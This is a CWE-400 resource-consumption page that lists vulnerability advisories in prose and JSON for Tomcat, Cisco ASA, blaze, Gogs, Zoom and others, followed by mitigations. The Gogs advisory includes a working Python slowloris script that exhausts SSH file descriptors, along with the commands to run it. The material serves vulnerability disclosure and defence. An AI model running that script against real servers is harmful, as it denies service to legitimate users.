Common Weakness Enumeration

CWE-400

Discouraged

Uncontrolled Resource Consumption

Abstraction: Class · Status: Draft

The product does not properly control the allocation and maintenance of a limited resource.

5401 vulnerabilities reference this CWE, most recent first.

GHSA-XMF4-J3J7-XJ7Q

Vulnerability from github – Published: 2022-04-30 18:20 – Updated: 2024-02-12 18:22
VLAI
Summary
Apache Tomcat DoS Via Requests Including Null Characters
Details

Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.tomcat:tomcat"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.3-beta"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2002-0935"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-12T18:22:51Z",
    "nvd_published_at": "2002-10-04T04:00:00Z",
    "severity": "MODERATE"
  },
  "details": "Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.",
  "id": "GHSA-xmf4-j3j7-xj7q",
  "modified": "2024-02-12T18:22:51Z",
  "published": "2022-04-30T18:20:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2002-0935"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/29dc6c2b625789e70a9c4756b5a327e6547273ff8bde7e0327af48c5@%3Cdev.tomcat.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/c62b0e3a7bf23342352a5810c640a94b6db69957c5c19db507004d74@%3Cdev.tomcat.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rb71997f506c6cc8b530dd845c084995a9878098846c7b4eacfae8db3@%3Cdev.tomcat.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20020822030311/http://www.iss.net/security_center/static/9396.php"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20021010182017/http://online.securityfocus.com/bid/5067"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20021116054924/http://online.securityfocus.com/archive/1/277940"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20070525180638/http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0120.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Apache Tomcat DoS Via Requests Including Null Characters"
}

GHSA-XMRH-PF7V-RVPG

Vulnerability from github – Published: 2022-05-24 16:45 – Updated: 2023-08-15 15:30
VLAI
Details

A vulnerability in the WebVPN login process of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause increased CPU utilization on an affected device. The vulnerability is due to excessive processing load for existing WebVPN login operations. An attacker could exploit this vulnerability by sending multiple WebVPN login requests to the device. A successful exploit could allow the attacker to increase CPU load on the device, resulting in a denial of service (DoS) condition.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-15388"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-05-03T15:29:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the WebVPN login process of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause increased CPU utilization on an affected device. The vulnerability is due to excessive processing load for existing WebVPN login operations. An attacker could exploit this vulnerability by sending multiple WebVPN login requests to the device. A successful exploit could allow the attacker to increase CPU load on the device, resulting in a denial of service (DoS) condition.",
  "id": "GHSA-xmrh-pf7v-rvpg",
  "modified": "2023-08-15T15:30:46Z",
  "published": "2022-05-24T16:45:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-15388"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-sd-cpu-dos"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XMW9-Q7X9-J5QC

Vulnerability from github – Published: 2021-02-02 21:42 – Updated: 2022-10-25 20:21
VLAI
Summary
Unbounded connection acceptance leads to file handle exhaustion
Details

Impact

All servers running blaze-core <= 0.14.14, including blaze-http and http4s-blaze-server users, are affected.

Blaze, accepts connections unconditionally on a dedicated thread pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections.

The vast majority of affected users are using it as part of http4s-blaze-server <= 0.21.16. http4s provides a mechanism for limiting open connections, but is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open.

Patches

The issue is fixed in version 0.14.15 for NIO1SocketServerGroup. A maxConnections parameter is added, with a default value of 512. Concurrent connections beyond this limit are rejected. To run unbounded, which is not recommended, set a negative number.

The NIO2SocketServerGroup has no such setting and is now deprecated.

Workarounds

  • An Nginx side-car acting as a reverse proxy for the local http4s-blaze-server instance would be able to apply a connection limiting semantic before the sockets reach blaze-core. Nginx’s connection bounding is both asynchronous and properly respects backpressure.
  • A similar sidecar strategy is viable for other non-HTTP services running on blaze-core.
  • http4s-ember-server is an alternative to http4s-blaze-server, but does not yet have HTTP/2 or web socket support. Its performance in terms of RPS is appreciably behind Blaze’s, and as the newest backend, has substantially less industrial uptake.
  • http4s-jetty is an alternative to http4s-blaze-server, but does not yet have web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake.
  • http4s-tomcat is an alternative to http4s-blaze-server, but does not yet have HTTP/2 web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake.

For more information

If you have any questions or comments about this advisory: * Open an issue in http4s/blaze * Contact us according to the http4s security policy

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.http4s:blaze-core_2.11"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.http4s:blaze-core_2.12"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.http4s:blaze-core_2.13"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-21293"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-02-02T21:40:18Z",
    "nvd_published_at": "2021-02-02T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nAll servers running blaze-core \u003c= 0.14.14, including blaze-http and http4s-blaze-server users, are affected.\n\nBlaze, accepts connections unconditionally on a dedicated thread pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections.\n\nThe vast majority of affected users are using it as part of http4s-blaze-server \u003c= 0.21.16.  http4s provides a mechanism for limiting open connections, but is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open.\n\n### Patches\n\nThe issue is fixed in version 0.14.15 for `NIO1SocketServerGroup`.  A `maxConnections` parameter is added, with a default value of 512.  Concurrent connections beyond this limit are rejected.  To run unbounded, which is not recommended, set a negative number.\n\nThe `NIO2SocketServerGroup`  has no such setting and is now deprecated.\n\n### Workarounds\n* An Nginx side-car acting as a reverse proxy for the local http4s-blaze-server instance would be able to apply a connection limiting semantic before the sockets reach blaze-core. Nginx\u2019s connection bounding is both asynchronous and properly respects backpressure.\n* A similar sidecar strategy is viable for other non-HTTP services running on blaze-core.\n* http4s-ember-server is an alternative to http4s-blaze-server, but does not yet have HTTP/2 or web socket support.  Its performance in terms of RPS is appreciably behind Blaze\u2019s, and as the newest backend, has substantially less industrial uptake.\n* http4s-jetty is an alternative to http4s-blaze-server, but does not yet have web socket support.  Its performance in terms of requests per second is somewhat behind Blaze\u2019s, and despite Jetty\u0027s industrial adoption, the http4s integration has substantially less industrial uptake.\n* http4s-tomcat is an alternative to http4s-blaze-server, but does not yet have HTTP/2 web socket support.  Its performance in terms of requests per second is somewhat behind Blaze\u2019s, and despite Jetty\u0027s industrial adoption, the http4s integration has substantially less industrial uptake.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [http4s/blaze](http://github.com/http4s/blaze)\n* Contact us according to the [http4s security policy](https://github.com/http4s/http4s/security/policy)",
  "id": "GHSA-xmw9-q7x9-j5qc",
  "modified": "2022-10-25T20:21:46Z",
  "published": "2021-02-02T21:42:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/http4s/blaze/security/advisories/GHSA-xmw9-q7x9-j5qc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/http4s/http4s/security/advisories/GHSA-xhv5-w9c5-2r2w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21293"
    },
    {
      "type": "WEB",
      "url": "https://github.com/http4s/blaze/commit/4f786177f9fb71ab272f3a5f6c80bca3e5662aa1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Unbounded connection acceptance leads to file handle exhaustion"
}

GHSA-XP35-9CRR-2X99

Vulnerability from github – Published: 2022-05-13 01:46 – Updated: 2022-05-13 01:46
VLAI
Details

An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. watchOS before 3.2.3 is affected. The issue involves the "Messages" component. It allows remote attackers to cause a denial of service (memory consumption and application crash).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-7063"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-07-20T16:29:00Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. watchOS before 3.2.3 is affected. The issue involves the \"Messages\" component. It allows remote attackers to cause a denial of service (memory consumption and application crash).",
  "id": "GHSA-xp35-9crr-2x99",
  "modified": "2022-05-13T01:46:50Z",
  "published": "2022-05-13T01:46:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7063"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT207923"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT207925"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/99881"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1038950"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XP3G-X2J2-G2M4

Vulnerability from github – Published: 2026-03-04 18:31 – Updated: 2026-03-04 18:31
VLAI
Details

An issue in DJI Mavic Mini, Spark, Mavic Air, Mini, Mini SE 0.1.00.0500 and below allows a remote attacker to cause a denial of service via the DJI Enhanced-WiFi transmission subsystem

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-26673"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-04T16:16:27Z",
    "severity": "HIGH"
  },
  "details": "An issue in DJI Mavic Mini, Spark, Mavic Air, Mini, Mini SE 0.1.00.0500 and below allows a remote attacker to cause a denial of service via the DJI Enhanced-WiFi transmission subsystem",
  "id": "GHSA-xp3g-x2j2-g2m4",
  "modified": "2026-03-04T18:31:53Z",
  "published": "2026-03-04T18:31:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26673"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ByteMe1001/DJI-CatNect"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XP5M-3M34-5M96

Vulnerability from github – Published: 2022-05-04 00:27 – Updated: 2022-05-04 00:27
VLAI
Details

The kiocb_batch_free function in fs/aio.c in the Linux kernel before 3.2.2 allows local users to cause a denial of service (OOPS) via vectors that trigger incorrect iocb management.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2012-0058"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2012-05-17T11:00:00Z",
    "severity": "MODERATE"
  },
  "details": "The kiocb_batch_free function in fs/aio.c in the Linux kernel before 3.2.2 allows local users to cause a denial of service (OOPS) via vectors that trigger incorrect iocb management.",
  "id": "GHSA-xp5m-3m34-5m96",
  "modified": "2022-05-04T00:27:49Z",
  "published": "2022-05-04T00:27:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0058"
    },
    {
      "type": "WEB",
      "url": "https://github.com/torvalds/linux/commit/802f43594d6e4d2ac61086d239153c17873a0428"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=782696"
    },
    {
      "type": "WEB",
      "url": "http://marc.info/?l=bugtraq\u0026m=139447903326211\u0026w=2"
    },
    {
      "type": "WEB",
      "url": "http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.2.2"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2012/01/18/7"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1027085"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XP79-5MX3-JX52

Vulnerability from github – Published: 2026-06-23 17:12 – Updated: 2026-06-23 17:12
VLAI
Summary
Gogs has Unauthenticated Asymmetric Denial of Service (DoS) via SSH Handshake Stall (File Descriptor Exhaustion)
Details

The Gogs built-in Go SSH server is vulnerable to an unauthenticated, asymmetric Denial of Service (DoS) attack. The application accepts inbound TCP connections and passes them to golang.org/x/crypto/ssh.NewServerConn inside a new goroutine without enforcing any read/write deadlines on the underlying net.Conn.

An unauthenticated attacker can open multiple TCP connections to the SSH port and simply withhold the SSH protocol banner. This forces the server to spawn an unbounded number of goroutines that block indefinitely waiting for socket I/O. This leads to complete File Descriptor (FD) exhaustion, preventing legitimate users from accessing the Git SSH service, and ultimately destabilizing the entire Gogs process (e.g., causing internal log rotation failures).

Vulnerability Details

In internal/ssh/ssh.go, the listen function contains an accept loop that spawns a goroutine for every incoming connection:

for {
    conn, err := listener.Accept()
    // ...
    go func() {
        // VULNERABILITY: No conn.SetDeadline() is called here
        sConn, chans, reqs, err := ssh.NewServerConn(conn, config)
        // ...
    }()
}

The golang.org/x/crypto/ssh package is transport-agnostic and explicitly relies on the caller to manage connection timeouts before initiating the cryptographic handshake. Because Gogs never calls conn.SetDeadline(), the call to NewServerConn eventually reaches io.ReadFull (inside readVersion()) and blocks forever on the kernel TCP socket waiting for the client to send the SSH-2.0-... banner.

Each stuck connection consumes a file descriptor and ~10KB of memory (Goroutine stack + connection structs). An attacker holding thousands of these connections open with zero bandwidth (no data sent) will quickly exhaust the OS ulimit -n limits (accept4: too many open files), completely neutralizing the service.

Steps to Reproduce

1. Environment Setup: Ensure Gogs is configured to use the built-in Go SSH server in app.ini:

[server]
START_SSH_SERVER = true
SSH_PORT = 2222
SSH_LISTEN_PORT = 2222

2. The Exploit (PoC): Save the following Python script as slowloris-ssh.py. This script connects to the SSH port and intentionally stalls the handshake.

#!/usr/bin/env python3
import socket, sys, time

target_host = sys.argv[1]
target_port = int(sys.argv[2])
n = int(sys.argv[3])

sockets = []
print(f"[*] Starting SSH Slowloris on {target_host}:{target_port}...")

for i in range(n):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_host, target_port))
        # VULNERABILITY EXPLOIT: Do NOT send the "SSH-2.0-..." banner.
        sockets.append(s)
        if i % 100 == 0:
            print(f"[+] {i} stuck connections established")
    except Exception as e:
        print(f"[-] Stopped at {i} connections. Reason: {e}")
        break

print(f"[+] Holding {len(sockets)} connections to starve the server...")
while True:
    time.sleep(60)

3. Execution: Run the script against the target, ensuring the number of connections (n) exceeds the server's configured file descriptor limit (e.g., 1500 for default 1024 ulimit environments): python3 slowloris-ssh.py <target-ip> 2222 1500

4. Observe the Impact:

  • Attempt to connect legitimately: nc -v <target-ip> 2222. The connection will hang or be refused immediately.
  • Inspect the Gogs server logs/console. You will observe catastrophic I/O failures such as: [clog] [file]: rename rotated file ...: no such file or directory accept4: too many open files

Impact

  • Denial of Service: Legitimate developers cannot push, pull, or clone repositories via SSH.

POC:-

watch the following video for poc

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "gogs.io/gogs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-52814"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-23T17:12:33Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "The Gogs built-in Go SSH server is vulnerable to an unauthenticated, asymmetric Denial of Service (DoS) attack. The application accepts inbound TCP connections and passes them to `golang.org/x/crypto/ssh.NewServerConn` inside a new goroutine without enforcing any read/write deadlines on the underlying `net.Conn`.\n\nAn unauthenticated attacker can open multiple TCP connections to the SSH port and simply withhold the SSH protocol banner. This forces the server to spawn an unbounded number of goroutines that block indefinitely waiting for socket I/O. This leads to complete File Descriptor (FD) exhaustion, preventing legitimate users from accessing the Git SSH service, and ultimately destabilizing the entire Gogs process (e.g., causing internal log rotation failures).\n\n### Vulnerability Details\n\nIn `internal/ssh/ssh.go`, the `listen` function contains an accept loop that spawns a goroutine for every incoming connection:\n\n```go\nfor {\n    conn, err := listener.Accept()\n    // ...\n    go func() {\n        // VULNERABILITY: No conn.SetDeadline() is called here\n        sConn, chans, reqs, err := ssh.NewServerConn(conn, config)\n        // ...\n    }()\n}\n\n```\n\nThe `golang.org/x/crypto/ssh` package is transport-agnostic and explicitly relies on the caller to manage connection timeouts before initiating the cryptographic handshake. Because Gogs never calls `conn.SetDeadline()`, the call to `NewServerConn` eventually reaches `io.ReadFull` (inside `readVersion()`) and blocks forever on the kernel TCP socket waiting for the client to send the `SSH-2.0-...` banner.\n\nEach stuck connection consumes a file descriptor and ~10KB of memory (Goroutine stack + connection structs). An attacker holding thousands of these connections open with zero bandwidth (no data sent) will quickly exhaust the OS `ulimit -n` limits (`accept4: too many open files`), completely neutralizing the service.\n\n### Steps to Reproduce\n\n**1. Environment Setup:**\nEnsure Gogs is configured to use the built-in Go SSH server in `app.ini`:\n\n```ini\n[server]\nSTART_SSH_SERVER = true\nSSH_PORT = 2222\nSSH_LISTEN_PORT = 2222\n\n```\n\n**2. The Exploit (PoC):**\nSave the following Python script as `slowloris-ssh.py`. This script connects to the SSH port and intentionally stalls the handshake.\n\n```python\n#!/usr/bin/env python3\nimport socket, sys, time\n\ntarget_host = sys.argv[1]\ntarget_port = int(sys.argv[2])\nn = int(sys.argv[3])\n\nsockets = []\nprint(f\"[*] Starting SSH Slowloris on {target_host}:{target_port}...\")\n\nfor i in range(n):\n    try:\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.settimeout(5)\n        s.connect((target_host, target_port))\n        # VULNERABILITY EXPLOIT: Do NOT send the \"SSH-2.0-...\" banner.\n        sockets.append(s)\n        if i % 100 == 0:\n            print(f\"[+] {i} stuck connections established\")\n    except Exception as e:\n        print(f\"[-] Stopped at {i} connections. Reason: {e}\")\n        break\n\nprint(f\"[+] Holding {len(sockets)} connections to starve the server...\")\nwhile True:\n    time.sleep(60)\n\n```\n\n**3. Execution:**\nRun the script against the target, ensuring the number of connections (`n`) exceeds the server\u0027s configured file descriptor limit (e.g., `1500` for default 1024 ulimit environments):\n`python3 slowloris-ssh.py \u003ctarget-ip\u003e 2222 1500`\n\n**4. Observe the Impact:**\n\n* Attempt to connect legitimately: `nc -v \u003ctarget-ip\u003e 2222`. The connection will hang or be refused immediately.\n* Inspect the Gogs server logs/console. You will observe catastrophic I/O failures such as:\n`[clog] [file]: rename rotated file ...: no such file or directory`\n`accept4: too many open files`\n\n### Impact\n\n* **Denial of Service:** Legitimate developers cannot push, pull, or clone repositories via SSH.\n\n### POC:-\n[watch the following video for poc](https://drive.google.com/file/d/1YGsZnxNIiwUuOrdKwJSfnRBfOEJcDHUJ/view?usp=sharing)",
  "id": "GHSA-xp79-5mx3-jx52",
  "modified": "2026-06-23T17:12:33Z",
  "published": "2026-06-23T17:12:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-xp79-5mx3-jx52"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/pull/8335"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/commit/7da9cda314054501e1a7938a9c4d7896f331b884"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gogs/gogs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/releases/tag/v0.14.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Gogs has Unauthenticated Asymmetric Denial of Service (DoS) via SSH Handshake Stall (File Descriptor Exhaustion)"
}

GHSA-XP7F-V245-W3W8

Vulnerability from github – Published: 2026-05-08 15:31 – Updated: 2026-05-08 21:31
VLAI
Details

An issue in fohrloop dash-uploader v.0.1.0 through v.0.7.0a2 allows a remote attacker to execute arbitrary code via the dash_uploader/httprequesthandler.py, dash_uploader/upload.py in the Upload function and max_file_size parameter, dash_uploader/configure_upload.py components

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-38361"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-08T15:16:37Z",
    "severity": "HIGH"
  },
  "details": "An issue in fohrloop dash-uploader v.0.1.0 through v.0.7.0a2 allows a remote attacker to execute arbitrary code via the dash_uploader/httprequesthandler.py, dash_uploader/upload.py in the Upload function and max_file_size parameter, dash_uploader/configure_upload.py components",
  "id": "GHSA-xp7f-v245-w3w8",
  "modified": "2026-05-08T21:31:25Z",
  "published": "2026-05-08T15:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-38361"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fohrloop/dash-uploader/issues/153"
    },
    {
      "type": "WEB",
      "url": "https://docs.python.org/3/library/functions.html#all"
    },
    {
      "type": "WEB",
      "url": "https://github.com/a1ohadance/CVE-2026-38361"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fohrloop/dash-uploader"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fohrloop/dash-uploader/blob/stable/dash_uploader/httprequesthandler.py"
    },
    {
      "type": "WEB",
      "url": "https://libraries.io/pypi/dash-uploader"
    },
    {
      "type": "WEB",
      "url": "https://pepy.tech/project/dash-uploader"
    },
    {
      "type": "WEB",
      "url": "https://pypi.org/project/dash-uploader"
    },
    {
      "type": "WEB",
      "url": "https://pypistats.org/packages/dash-uploader"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XPGJ-RHC7-55QX

Vulnerability from github – Published: 2023-09-11 15:31 – Updated: 2024-04-04 07:35
VLAI
Details

An issue was discovered in Qubo Smart Plug 10A version HSP02_01_01_14_SYSTEM-10A, allows attackers to cause a denial of service (DoS) via Wi-Fi deauthentication.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-36161"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-11T13:15:24Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered in Qubo Smart Plug 10A version HSP02_01_01_14_SYSTEM-10A, allows attackers to cause a denial of service (DoS) via Wi-Fi deauthentication.",
  "id": "GHSA-xpgj-rhc7-55qx",
  "modified": "2024-04-04T07:35:02Z",
  "published": "2023-09-11T15:31:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36161"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Yashodhanvivek/Qubo_smart_switch_security_assessment/blob/main/Qubo_Smart_Plug_10A_Security_Assessment.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XPJ5-4MPQ-74XF

Vulnerability from github – Published: 2022-02-11 00:00 – Updated: 2022-02-18 00:01
VLAI
Details

The Zoom Client for Meetings chat functionality was susceptible to Zip bombing attacks in the following product versions: Android before version 5.8.6, iOS before version 5.9.0, Linux before version 5.8.6, macOS before version 5.7.3, and Windows before version 5.6.3. This could lead to availability issues on the client host by exhausting system resources.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-22780"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-02-09T23:15:00Z",
    "severity": "HIGH"
  },
  "details": "The Zoom Client for Meetings chat functionality was susceptible to Zip bombing attacks in the following product versions: Android before version 5.8.6, iOS before version 5.9.0, Linux before version 5.8.6, macOS before version 5.7.3, and Windows before version 5.6.3. This could lead to availability issues on the client host by exhausting system resources.",
  "id": "GHSA-xpj5-4mpq-74xf",
  "modified": "2022-02-18T00:01:00Z",
  "published": "2022-02-11T00:00:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22780"
    },
    {
      "type": "WEB",
      "url": "https://explore.zoom.us/en/trust/security/security-bulletin"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Mitigation
Architecture and Design

Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.

Mitigation
Architecture and Design
  • Mitigation of resource exhaustion attacks requires that the target system either:
  • The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
  • The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
  • recognizes the attack and denies that user further access for a given amount of time, or
  • uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Mitigation
Implementation

Ensure that all failures in resource allocation place the system into a safe posture.

CAPEC-147: XML Ping of the Death

An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.

CAPEC-227: Sustained Client Engagement

